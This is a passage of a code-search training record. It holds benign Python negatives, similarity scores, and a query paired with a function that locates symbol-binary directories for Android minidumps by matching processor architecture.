\"Duration: \" + str(evt.compile_end.duration) + \" us\\n\" + \\\n evt.compile_end.compilation_report.decode('utf-8')\n elif evt.type == IpuTraceEvent.HOST_TO_DEVICE_TRANSFER:\n evt_str = \"Host->Device\\n\" + \\\n evt.data_transfer.data_transfer.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.DEVICE_TO_HOST_TRANSFER:\n evt_str = \"Device->Host\\n\" + \\\n evt.data_transfer.data_transfer.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.LOAD_ENGINE:\n evt_str = \"Load engine: \" + \\\n evt.load_engine.module_name.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.EXECUTE:\n evt_str = \"Execute: \" + \\\n evt.execute.module_name.decode('utf-8') + \"\\n\" + \\\n evt.execute.execution_report.decode('utf-8')\n else:\n evt_str = \"Unknown event\"\n\n result = result + evt_str + '\\n'\n\n return result", "def remove_firebug_calls(js_data):\n js_data = re.compile('console\\.[^(]*?\\([^()]*?\\);').sub(\"\", js_data)\n return js_data", "def get_crypto_hiddenimports():\n try:\n # The _AES.so module exists only in PyCrypto 2.6 and later. Try to import\n # that first.\n modname = 'Crypto.Cipher._AES'\n import_aes(modname)\n except ImportError:\n # Fallback to AES.so, which should be there in PyCrypto 2.4 and earlier.\n modname = 'Crypto.Cipher.AES'\n import_aes(modname)\n return modname", "def _getDiagnosticString():\n text = '\\n## Diagnostic output from minimalmodbus ## \\n\\n'\n text += 'Minimalmodbus version: ' + __version__ + '\\n'\n text += 'Minimalmodbus status: ' + __status__ + '\\n'\n text += 'Revision: ' + __revision__ + '\\n'\n text += 'Revision date: ' + __date__ + '\\n'\n text += 'File name (with relative path): ' + __file__ + '\\n'\n text += 'Full file path: ' + os.path.abspath(__file__) + '\\n\\n'\n text += 'pySerial version: ' + serial.VERSION + '\\n'\n text += 'pySerial full file path: ' + os.path.abspath(serial.__file__) + '\\n\\n'\n text += 'Platform: ' + sys.platform + '\\n'\n text += 'Filesystem encoding: ' + repr(sys.getfilesystemencoding()) + '\\n'\n text += 'Byteorder: ' + sys.byteorder + '\\n'\n text += 'Python version: ' + sys.version + '\\n'\n text += 'Python version info: ' + repr(sys.version_info) + '\\n'\n text += 'Python flags: ' + repr(sys.flags) + '\\n'\n text += 'Python argv: ' + repr(sys.argv) + '\\n'\n text += 'Python prefix: ' + repr(sys.prefix) + '\\n'\n text += 'Python exec prefix: ' + repr(sys.exec_prefix) + '\\n'\n text += 'Python executable: ' + repr(sys.executable) + '\\n'\n try:\n text += 'Long info: ' + repr(sys.long_info) + '\\n'\n except:\n text += 'Long info: (none)\\n' # For Python3 compatibility\n try:\n text += 'Float repr style: ' + repr(sys.float_repr_style) + '\\n\\n'\n except:\n text += 'Float repr style: (none) \\n\\n' # For Python 2.6 compatibility\n text += 'Variable __name__: ' + __name__ + '\\n'\n text += 'Current directory: ' + os.getcwd() + '\\n\\n'\n text += 'Python path: \\n'\n text += '\\n'.join(sys.path) + '\\n'\n text += '\\n## End of diagnostic output ## \\n'\n return text", "def _parseKeyNames(lib):\n _keyNames = {}\n for attr in dir(lib): # from the modules variables\n if attr[:6] == 'TCODK_': # get the K_* constants\n _keyNames[getattr(lib, attr)] = attr[6:] # and make CODE=NAME pairs\n return _keyNames", "def _get_so_name(filename):\n # TODO verify that objdump works on other unixes and not Linux only.\n cmd = [\"objdump\", \"-p\", filename]\n pattern = r'\\s+SONAME\\s+([^\\s]+)'\n if is_solar:\n cmd = [\"elfdump\", \"-d\", filename]\n pattern = r'\\s+SONAME\\s+[^\\s]+\\s+([^\\s]+)'\n m = re.search(pattern, compat.exec_command(*cmd))\n return m.group(1)", "def clean_imports(import_list):\r\n\r\n mod_lst = []\r\n\r\n while import_list:\r\n if ',' in import_list[0]:\r\n if import_list[0][0:6] == 'import':\r\n temp_ = import_list[0][6:].split(',')\r\n for i in temp_:\r\n import_list.append('import ' + i)\r\n\r\n import_list[0] = 'Fixed'\r\n\r\n if import_list[0][0:4] == 'from':\r\n temp_ = import_list[0].split('import')\r\n part_1 = temp_[0]\r\n part_2 = temp_[1].lstrip().rstrip().split(',')\r\n for i in part_2:\r\n import_list.append(str(part_1) + ' import ' + str(i))\r\n\r\n import_list[0] = 'Fixed'\r\n\r\n temp = import_list[0].split()\r\n\r\n if len(temp) == 2 and temp[0] == 'import':\r\n mod_lst.append(temp[1])\r\n import_list[0] = 'Fixed'\r\n\r\n elif len(temp) == 4 and temp[0] == 'import' and temp[2] == 'as':\r\n mod_lst.append(temp[1])\r\n import_list[0] = 'Fixed'\r\n\r\n elif len(temp) == 4 and temp[0] == 'from':\r\n if temp[3] != '*':\r\n mod_lst.append(str(temp[1]) + '.' + str(temp[3]))\r\n else:\r\n mod_lst.append(str(temp[1]))\r\n import_list[0] = 'Fixed'\r\n\r\n del import_list[0]\r\n\r\n return mod_lst", "def make_proj_stack(err_msg: str) -> List[Tuple[str,int]]:\n e0449 = re.compile(r\"error(?:\\[E0449\\])?\\: unnecessary visibility qualifier(?:\\n|\\r\\n)\\s+--> ([\\w\\\\/\\.]+)\\:(\\d+)\")\n pstack = [(a[0],int(a[1])) for a in e0449.findall(err_msg)]\n pstack = list(set(pstack)) # This definitely feels wrong.\n pstack.sort()\n return pstack", "def getfullnameof(mod, xtrapath=None):\n pywin32_paths = []\n if is_win:\n pywin32_paths = [os.path.join(get_python_lib(), 'pywin32_system32')]\n if is_venv:\n pywin32_paths.append(\n os.path.join(base_prefix, 'Lib', 'site-packages',\n 'pywin32_system32')\n )\n\n epath = (sys.path + # Search sys.path first!\n pywin32_paths +\n winutils.get_system_path() +\n compat.getenv('PATH', '').split(os.pathsep))\n if xtrapath is not None:\n if type(xtrapath) == type(''):\n epath.insert(0, xtrapath)\n else:\n epath = xtrapath + epath\n for p in epath:\n npth = os.path.join(p, mod)\n if os.path.exists(npth) and matchDLLArch(npth):\n return npth\n return ''", "def _parse_freeze(text):\n result = []\n for line in text.splitlines():\n line = line.strip()\n if line.startswith('-'):\n raise Exception(\"Irregular line: %s\" % line)\n if line.startswith('#'):\n continue\n if not line:\n continue\n package, version = line.split('==')[:2]\n result.append((package, version))\n return result", "def get_extra_attestation(self):\n main = sys.modules['__main__']\n main_source = inspect.getsource(main)\n d = hashlib.sha1()\n d.update(main_source)\n return base64.b64encode(d.digest())", "def extractReservedWords_top50(code):\n reserved_words=[] #https://realpython.com/lessons/reserved-keywords/5646\n code = str(code).replace(\"\\n\", \"\")\n qa_top50_adjv2 = ['+', '<', 'of', '*', \"'\", '\"', '==', 'File', '>', 'to', '#', '=', '+=', 'print', '%', '!=', '-', ':', 'i', 'x', 'line']\n for c in code.split(\" \"): \n if keyword.iskeyword(c): \n reserved_words.append(c) \n elif c in qa_top50_adjv2:\n reserved_words.append(c)\n else:\n continue\n str1= \" \"\n return (str1.join(reserved_words))", "def check_for_source_in_parent(elf, addr):\n result = subprocess.run(\n (DWARFDUMP, \"--lookup=0x\" + addr, \"-p\", elf), capture_output=True, text=True\n )\n dwarfdump = result.stdout\n matches = re.findall(dw_at_file_re, dwarfdump)\n\n def getFile(line):\n return line.strip().split('\"')[1]\n\n source_files = list(map(getFile, matches))\n for (i, f) in enumerate(source_files[::-1]):\n if \"/core/\" not in f:\n line_matches = re.findall(dw_at_line_re, dwarfdump)\n\n def getLine(line):\n return line.strip().split(\"(\")[1].split(\")\")[0]\n\n source_lines = list(map(getLine, line_matches))\n source_line = source_lines[::-1][i]\n return (f, source_line)\n return (\"\", \"\")", "def strip_dsym(self, platfiles):\n\n #\n # .dSYM directories are contain detached debugging information and\n # should be completely removed when the \"strip\" option is specified.\n #\n if self.dry_run:\n return platfiles\n for dirpath, dnames, fnames in os.walk(self.appdir):\n for nm in list(dnames):\n if nm.endswith('.dSYM'):\n print(\"removing debug info: %s/%s\"%(dirpath, nm))\n shutil.rmtree(os.path.join(dirpath, nm))\n dnames.remove(nm)\n return [file for file in platfiles if '.dSYM' not in file]", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def get_used_release_specs(package, installed_version=None):", "def build_missing_imports(self) -> None:\n self.undefined -= set(dir(__import__(\"builtins\")))\n\n # Optimisation: we will almost always define sys and pypprint. However, in order for us to\n # get to `import sys`, we'll need to examine our wildcard imports, which in the presence\n # of config, could be slow.\n if \"pypprint\" in self.undefined:\n pypprint_def = (\n inspect.getsource(pypprint) if self.define_pypprint else \"from pyp import pypprint\"\n )\n self.before_tree.body = ast.parse(pypprint_def).body + self.before_tree.body\n self.undefined.remove(\"pypprint\")\n if \"sys\" in self.undefined:\n self.before_tree.body = ast.parse(\"import sys\").body + self.before_tree.body\n self.undefined.remove(\"sys\")\n # Now short circuit if we can\n if not self.undefined:\n return\n\n def get_names_in_module(module: str) -> Any:\n try:\n mod = importlib.import_module(module)\n except ImportError as e:\n raise PypError(\n f\"Config contains wildcard import from {module}, but {module} failed to import\"\n ) from e\n return getattr(mod, \"__all__\", (n for n in dir(mod) if not n.startswith(\"_\")))\n\n subimports = {\"Path\": \"pathlib\", \"pp\": \"pprint\"}\n wildcard_imports = (\n [\"itertools\", \"math\", \"collections\"]\n + self.config.wildcard_imports\n + self.wildcard_imports\n )\n subimports.update(\n {name: module for module in wildcard_imports for name in get_names_in_module(module)}\n )\n\n def get_import_for_name(name: str) -> str:\n if name in subimports:\n return f\"from {subimports[name]} import {name}\"\n return f\"import {name}\"\n\n self.before_tree.body = [\n ast.parse(stmt).body[0] for stmt in sorted(map(get_import_for_name, self.undefined))\n ] + self.before_tree.body", "def extractLocals(trcback):\n\n\toutput = []\n\tstack = extractStack(getInnerMostFrame(trcback))\n\tfor frame, fileName, lineNumber, name, context, index in stack:\n\t\targsNames, nameless, keyword = extractArguments(frame)\n\t\targuments, namelessArgs, keywordArgs, locals = OrderedDict(), [], {}, {}\n\t\tfor key, data in frame.f_locals.iteritems():\n\t\t\tif key == nameless:\n\t\t\t\tnamelessArgs = map(repr, frame.f_locals.get(nameless, ()))\n\t\t\telif key == keyword:\n\t\t\t\tkeywordArgs = dict((arg, repr(value)) for arg, value in frame.f_locals.get(keyword, {}).iteritems())\n\t\t\telif key in argsNames:\n\t\t\t\targuments[key] = repr(data)\n\t\t\telse:\n\t\t\t\tlocals[key] = repr(data)\n\t\toutput.append(((name, fileName, lineNumber), (arguments, namelessArgs, keywordArgs, locals)))\n\treturn output", "def matches_panic_funcs(name):\n for func in panic_functions:\n if func in name:\n return func\n return \"\"", "def extract_messages_from_python_code(code: str) -> list[tuple[int, str, str | None]]:\n\tfrom babel.messages.extract import extract_python\n\n\tmessages = []\n\n\tfor message in extract_python(\n\t\tio.BytesIO(code.encode()),\n\t\tkeywords=[\"_\"],\n\t\tcomment_tags=(),\n\t\toptions={},\n\t):\n\t\tlineno, _func, args, _comments = message\n\n\t\tif not args or not args[0]:\n\t\t\tcontinue\n\n\t\tsource_text = args[0] if isinstance(args, tuple) else args\n\t\tcontext = args[1] if len(args) == 2 else None\n\n\t\tmessages.append((lineno, source_text, context))\n\n\treturn messages", "def used_mods(ffile):\n import re\n import codecs\n\n # Go through line by line,\n # remove comments and strings because the latter can include ';'.\n # Then split at at ';', if given.\n # The stripped line should start with 'use '.\n # After use should be the \"module_name\", ', intrinsic :: module_name', or\n # ', non_intrinsic :: module_name'. We allow also to use \":: module_name\"\n # After module name should only be ', only: ...' or ', a ==> b'\n olist = list()\n of = codecs.open(ffile, 'r', encoding='ascii', errors='ignore')\n for line in of:\n ll = line.rstrip().lower() # everything lower case\n ll = re.sub('!.*$', '', ll) # remove F90 comment\n ll = re.sub('^c.*$', '', ll) # remove F77 comments\n ll = re.sub('\".*?\"', '', ll) # remove \"string\"\n ll = re.sub(\"'.*?'\", '', ll) # remove 'string'\n # check if several commands are on one line\n if ';' in ll:\n lll = ll.split(';')\n else:\n lll = [ll]\n for il in lll:\n iil = il.strip()\n # line should start with 'use '\n if iil.startswith('use '):\n iil = iil[4:].strip() # remove 'use '\n # skip intrinsic modules\n if 'intrinsic' in iil:\n if 'non_intrinsic' in iil:\n iil = re.sub(', *non_intrinsic', '', iil)\n iil = iil.strip()\n else:\n continue # skip to next in lll\n if iil.startswith('::'):\n iil = iil[2:].strip() # remove ':: '\n # remove after ',' if rename-list or only-list\n iil = re.sub(',.*$', '', iil)\n olist.append(iil.strip())\n of.close()\n\n return olist" ]
[ "0.606551", "0.5674643", "0.56701034", "0.5526038", "0.5405917", "0.5370439", "0.5335965", "0.52976125", "0.52932", "0.52613264", "0.523408", "0.52253866", "0.5208155", "0.51849467", "0.51835585", "0.5180916", "0.51393825", "0.51383364", "0.513191", "0.5112789", "0.5104473", "0.50578815", "0.50216293", "0.50041467", "0.5003027", "0.49749237", "0.49329785", "0.49150857", "0.4866886", "0.48564276", "0.4852639", "0.48414445", "0.48408955", "0.48215082", "0.48156932", "0.48125988", "0.47987548", "0.47874787", "0.47760785", "0.4749018", "0.47472137", "0.47400233", "0.47341272", "0.4725964", "0.47249046", "0.47239196", "0.47166908", "0.47100824", "0.47082928", "0.47064915", "0.4700201", "0.46959722", "0.46835178", "0.4683026", "0.46759522", "0.4667235", "0.46610236", "0.46591234", "0.4659039", "0.465781", "0.46481767", "0.46244848", "0.4624364", "0.46186358", "0.46154368", "0.46024194", "0.46009308", "0.4586226", "0.45853284", "0.4584383", "0.45777407", "0.4576848", "0.45739833", "0.45711672", "0.45651016", "0.4562862", "0.4561657", "0.4552211", "0.4547967", "0.45408314", "0.4525303", "0.4521939", "0.45032117", "0.45029286", "0.4502884", "0.4502283", "0.45008788", "0.4496249", "0.44913903", "0.44894168", "0.44857934", "0.44827262", "0.4480994", "0.44778895", "0.44766033", "0.44756806", "0.44616377", "0.44564363", "0.44540724", "0.44465628" ]
0.74637324
0
Gets the directory that should contain symbol binaries for |minidump|.
def _GetSymbolBinaryDirectory(self, minidump, libraries): if minidump in self._minidump_symbol_binaries_directories: return self._minidump_symbol_binaries_directories[minidump] # Get the processor architecture reported by the minidump. arch = None matcher = re.compile(_PROCESSOR_ARCH_REGEX) for line in self._GetMinidumpDumpOutput(minidump).splitlines(): match = matcher.match(line) if match: arch = match.groupdict()['arch'].lower() break if not arch: logging.error('Unable to find processor architecture for minidump %s', minidump) self._minidump_symbol_binaries_directories[minidump] = None return None if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX: logging.error( 'Unsupported processor architecture %s for minidump %s. This is ' 'likely fixable by adding the correct mapping for the architecture ' 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.', arch, minidump) self._minidump_symbol_binaries_directories[minidump] = None return None # Look for a directory that contains binaries with the correct architecture. matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch]) symbol_dir = None for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES: possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir) if not os.path.exists(possible_symbol_dir): continue for f in os.listdir(possible_symbol_dir): if f not in libraries: continue binary_path = os.path.join(possible_symbol_dir, f) stdout = subprocess.check_output( ['file', binary_path], stderr=subprocess.STDOUT) if matcher.match(stdout): symbol_dir = possible_symbol_dir break if not symbol_dir: logging.error( 'Unable to find suitable symbol binary directory for architecture %s.' 'This is likely fixable by adding the correct directory to ' 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.', arch) self._minidump_symbol_binaries_directories[minidump] = symbol_dir return symbol_dir
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_bin_dir():\n return os.path.abspath(os.path.join(get_root_dir(), 'bin/'))", "def GetSymbolBinaries(self, minidump):\n libraries = self._ExtractLibraryNamesFromDump(minidump)\n symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries)\n if not symbol_binary_dir:\n return []\n\n return [os.path.join(symbol_binary_dir, lib) for lib in libraries]", "def dir_bin():\n return abspath('bin')", "def GetBinDirectory(self, *args):\n return _gmat_py.FileManager_GetBinDirectory(self, *args)", "def _getCodeFolder(self):\n if getattr(sys, 'frozen', False):\n # we are running in a bundle (frozen)\n bundle_dir = sys._MEIPASS\n else:\n # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\n return bundle_dir", "def binpath(self):\n return self.__bin", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def getDebugDirectory(self) -> ghidra.app.util.bin.format.pe.debug.DebugDirectory:\n ...", "def get_crash_dumps_path(self):\n\t\treturn call_sdk_function('PrlApi_GetCrashDumpsPath')", "def get_exec_path():\n if hasattr(sys, \"frozen\"): # compiled by py2exe\n return os.path.dirname(sys.executable)\n else:\n return os.path.dirname(sys.path[0]) # should be path to /fpdb", "def binpath(self):\n return self._query_config()['binpath']", "def find_tool():\n return shutil.which('dump')", "def get_condor_bin_dir(config):\n condor_root = config['condor-root']\n if condor_root:\n return osp.join(condor_root, 'bin')\n else:\n return ''", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def binary_location(cmd, USE_PATH=False):\n return os.path.join(BIN_PREFIX, cmd)", "def get_bin_path(self, filename):\n pg_config = get_config()\n if pg_config is None or \"BINDIR\" not in pg_config:\n return filename\n else:\n return os.path.join(pg_config.get(\"BINDIR\"), filename)", "def output_dir():\n #pdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n outpath = os.path.join(OUTPUT_DIR, pdbid(),\"\") # OUTPUT DIRECTORY WHERE OUTPUT FILES WILL GO\n\n return outpath", "def get_exec_path(self):\n bin_name = 'test_hint_time'\n # Look for in place build\n script_dir = os.path.dirname(os.path.realpath(__file__))\n bin_path = os.path.join(script_dir, '.libs', bin_name)\n if not os.path.exists(bin_path):\n # Look for out of place build from using apps/build_func.sh\n int_dir = os.path.dirname(script_dir)\n bin_path_op = os.path.join(int_dir, 'build/integration/test/.libs', bin_name)\n if not os.path.exists(bin_path_op):\n msg = 'Could not find application binary, tried \\n \"{}\"\\n \"{}\"'.format(\n bin_path, bin_path_op)\n raise RuntimeError(msg)\n bin_path = bin_path_op\n return bin_path", "def mapto_dir(self):\r\n return os.path.join(self._work_dir, 'mapped-jars')", "def __GetGenModuleDir(cls, src):\n return os.path.dirname(src.replace(FileUtils.GetSrcRoot(), cls.GetSwigOutDir()))", "def bin_root(self):\n return os.path.join(self.build_dir, self.build, \"stage0\")", "def get_debug_directory(self):\n \n try:\n data_dir = self.debug_dir()\n except ValueError, why:\n return obj.NoneObject(str(why))\n\n return obj.Object(\"_IMAGE_DEBUG_DIRECTORY\", \n offset = self.DllBase + data_dir.VirtualAddress, \n vm = self.obj_native_vm)", "def get_package_dir():\n return Path(__file__).parent", "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def getBinary():\n binary = shutil.which(_ROCKETLOGGER_BINARY)\n\n if not os.path.exists(binary):\n raise FileNotFoundError(f\"Could not find RocketLogger CLI binary! [{binary}]\")\n return os.path.abspath(binary)", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def get_bitstream_path():\n\n env = get_env()\n\n # Derive destination path\n cache_dir = os.getenv(\"VTA_CACHE_PATH\", os.path.join(os.getenv(\"HOME\"), \".vta_cache/\"))\n cache_dir = os.path.join(cache_dir, env.TARGET)\n cache_dir = os.path.join(cache_dir, env.HW_VER.replace(\".\", \"_\"))\n # Create the directory if it didn't exist\n if not os.path.exists(cache_dir):\n os.makedirs(cache_dir)\n bit_path = os.path.join(cache_dir, env.BITSTREAM) + \".bit\"\n\n return bit_path", "def get_binary_name():\n return os.path.basename(inspect.stack()[-1][1])[:16]", "def get_pack_path():\r\n return get_package_path().replace(\"\\\\\", \"/\").replace(\"src\", \"\")", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def get_temp_dir(self):\n base = tempfile.gettempdir()\n ring_mo = RING_MATCHER.match(self.filename)\n if not ring_mo:\n return base\n\n universe = ring_mo.group(3) + '.Universe'\n ring = ring_mo.group(4) + '.Ring'\n if 'SoloFocus' in self.filename:\n ring += '.Local'\n\n temp_dir = self.meditech_pgmsource_cache(universe, ring)\n if not os.path.exists(temp_dir):\n if os.path.exists(os.path.dirname(temp_dir)):\n try:\n create_dir(temp_dir)\n except OSError:\n return base\n else:\n return base\n\n codebase = os.path.basename(os.path.dirname(self.filename))\n temp_dir = os.path.join(temp_dir, codebase)\n\n try:\n create_dir(temp_dir)\n except OSError:\n return base\n else:\n return temp_dir", "def module_path():\r\n if hasattr(sys, \"frozen\"):\r\n return os.path.dirname(sys.executable)\r\n return os.path.dirname(__file__)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def shared_binary_location(cmd=\"shared\"):\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)", "def _get_package_dir(self, package, component):\n return join('pool', component, Repository.get_pool(package), package)", "def getSteamAppDir(appid: int) -> str:\n\tfor path in libraryFolders():\n\t\ttry:\n\t\t\tlogger.info(f'searching for {appid} in {path}..')\n\t\t\twith open(f'{path}appmanifest_{appid}.acf', 'r') as file:\n\t\t\t\t# found the app!\n\t\t\t\t# get the app's name\n\t\t\t\tinstDir = Property.parse( file, f'appmanifest_{appid}.acf' ).as_dict()[ 'appstate' ][ 'installdir' ]\n\t\t\t\tpath += f'common/{instDir}/'\n\t\t\t\tlogger.info(f'{appid} found! path: {path}')\n\t\t\t\treturn path\n\t\texcept FileNotFoundError:\n\t\t\t# if no, just continue\n\t\t\tcontinue\n\traise RuntimeError(f'No path found for app {appid}!')", "def output_dir(self):\n return self.c.build_dir.join(self.c.build_config_fs)", "def tmpDir(package):\n\treturn 'debian/'+package", "def get_cur_directory(file_name: str=__file__) -> str:\n if hasattr(sys, 'frozen') and sys.frozen:\n path, filename = os.path.split(sys.executable)\n directory = path\n else:\n directory = os.path.dirname(os.path.realpath(file_name))\n return directory", "def get_reference_binary():\n return \"./Binary/linux-x64/astcenc\"", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def module_path():\n try:\n this_file_path = __file__\n except NameError:\n # inside an interpreter, we can use the stack to find the file\n # path.\n tbs = traceback.extract_stack()\n this_file_path = tbs[0][0]\n # move back up to rfm directory\n dev_root = os.path.dirname(this_file_path)\n\n return dev_root", "def symbol_to_path(symbol, base_dir=None):\n if base_dir is None:\n base_dir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def _search_path_to_file(self, directory, binary_name):\n for root, dirs, files in os.walk(directory):\n if binary_name in files:\n return os.path.join(root, binary_name)\n raise micp_kernel.NoExecutableError", "def _GetDefaultBinPathExcludes(self):\n if sys.platform == \"win32\":\n import cx_Freeze.util\n systemDir = cx_Freeze.util.GetSystemDir()\n windowsDir = cx_Freeze.util.GetWindowsDir()\n return [windowsDir, systemDir, os.path.join(windowsDir, \"WinSxS\")]\n elif sys.platform == \"darwin\":\n return [\"/lib\", \"/usr/lib\", \"/System/Library/Frameworks\"]\n else:\n return [\"/lib\", \"/lib32\", \"/lib64\", \"/usr/lib\", \"/usr/lib32\",\n \"/usr/lib64\"]", "def get_directory(self):\n mypath = mlblocks.get_primitives_paths()[-1]\n return mypath", "def test_llvm_bin_dir(self):\n self.assertEqual(\n self.ndk.llvm_bin_dir,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin\",\n )", "def get_build_dir(package_dir):\n return os.path.split(makepkg([\"--packagelist\"], True, package_dir)[0])[0]", "def binary_location(cmd, USE_PATH=False):\n if USE_PATH:\n return cmd\n else:\n return os.path.join(BIN_PREFIX, cmd)", "def getMHCIPDBFpBin(self):\n fn = \"mhcI_pdbs.bin\"\n return self.joinPath(self.mhcIdb_pdb_path, fn)", "def get_test_binary():\n return \"./Source/astcenc\"", "def getCoreDir(thisDir):\n coreFolder = str(CoreDirectory())\n # print(('coreDirectory: %s'% coreFolder))\n #the stuff testing for existance of natlinkmain.py etc has been removed, no\n #longer required.\n return coreFolder", "def getmp_mpdir():\n return os.path.join(getmp_rootdir(), 'lib', 'python', 'mod_python')", "def debug_dir(self):\n return self._directory(6) # IMAGE_DEBUG_DIRECTORY", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def pdb_path(scope=\"session\"):\n return join(dirname(__file__), pardir, \"new_data\", \"pdb\")", "def get_target_binary():\n file_location = prompt_base(\"where is the file located?\")\n file_location = os.path.abspath(file_location)\n return file_location", "def get_axebindir():\n import sys\n\n if 'axesrc' in sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def symbol_to_path(symbol, base_dir=\"files/input\"):\n print('base_dir=', base_dir)\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def symbol_to_path(symbol, base_dir=\"files/input\"):\n print ('base_dir=',base_dir)\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def binaries_path(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def package_dir(self):\r\n return \".\"", "def find_resource_dir(self, dock_image: str, meta: dict) -> str:\n try:\n return self.interrogate_python_package_location(dock_image, meta)\n except CalledProcessError:\n return ''", "def __get_module_root_dir(self):\n # type: () -> str\n if self.location in ['.', '.' + os.sep]:\n return self.env_root\n if self.source != 'local':\n return self.__fetch_remote_source()\n return os.path.join(self.env_root, self.location)", "def find_brew_binary_location(package_folder, search_string):\n match_str = '/usr/local/Cellar/%s/**/*%s*' % (package_folder,\n search_string)\n paths = glob.glob(match_str, recursive=True)\n for path in paths:\n if os.access(path, os.X_OK):\n return path\n return None", "def datadir(cls): # pylint: disable=E0213\n mod = sys.modules[cls.__module__]\n return osp.join(osp.dirname(osp.abspath(mod.__file__)), 'data')", "def module_path():\n from sys import path\n from os import getcwd\n from os.path import basename,exists\n from inspect import getmodulename,getfile\n from logging import warn\n # 'getfile' retreives the source file name name compiled into the .pyc file.\n pathname = getfile(lambda x: None)\n if exists(pathname): return pathname\n # The module might have been compiled on a different machine or in a\n # different directory.\n pathname = pathname.replace(\"\\\\\",\"/\")\n filename = basename(pathname)\n dirs = [dir for dir in [getcwd()]+path if exists(dir+\"/\"+filename)]\n if len(dirs) == 0: warn(\"pathname of file %r not found\" % filename)\n dir = dirs[0] if len(dirs) > 0 else \".\"\n pathname = dir+\"/\"+filename\n return pathname", "def symbol_to_path(symbol, base_dir= proj_path + '/data/'): \n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))", "def _states_path():\n return os.path.join(__opts__[\"cachedir\"], \"freezer\")", "def get_app_root():\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n return sys._MEIPASS\n except AttributeError:\n if 'pytest' in sys.modules:\n for arg in reversed(sys.argv):\n path = os.path.realpath(arg.split('::')[0])\n if os.path.exists(path):\n return path if os.path.isdir(path) else os.path.dirname(path)\n else:\n return os.path.dirname(os.path.realpath(sys.argv[0]))", "def _build_binary_file_path(program_path: pathlib.Path, build_dir: pathlib.Path, hex_file: bool) -> pathlib.Path:\n fw_fbase = build_dir / program_path.name\n fw_file = fw_fbase.with_suffix(\".hex\" if hex_file else \".bin\")\n if not fw_file.exists():\n raise BinaryFileNotFoundError(f\"Build program file (firmware) not found {fw_file}\")\n return fw_file", "def getmp_rootdir():\n return os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))", "def get_hopper_script_dir():\n\n dirs = [os.path.expanduser(\"~/.local/share/data/Hopper/scripts\"),\n os.path.expandvars(\"%LOCALAPPDATA%/Hopper/scripts\"),\n os.path.expanduser(\"~/Library/Application Support/Hopper/Scripts/HopperScripts\")]\n for directory in dirs:\n if os.path.exists(directory):\n return directory\n return None", "def flag_dir(self):\n return self.system_path(self._flag_dir)", "def path(self):\n if not self._path:\n logger.spam(\"Checking for helper executable %s\", self.name)\n self._path = distutils.spawn.find_executable(self.name)\n if self._path:\n logger.debug(\"%s is at %s\", self.name, self.path)\n self._installed = True\n else:\n logger.debug(\"No path to %s found\", self.name)\n return self._path", "def _get_mingw_dll_dir():\n gfortran_exe = shutil.which(\"gfortran\")\n if gfortran_exe is None:\n return None\n\n gfortran_exe = pathlib.Path(gfortran_exe)\n bin_dir = gfortran_exe.resolve().parent\n matches = list(bin_dir.glob(\"libgfortran*.dll\"))\n if len(matches) == 0:\n return None\n\n return str(bin_dir)", "def exepath(filename):\r\n return 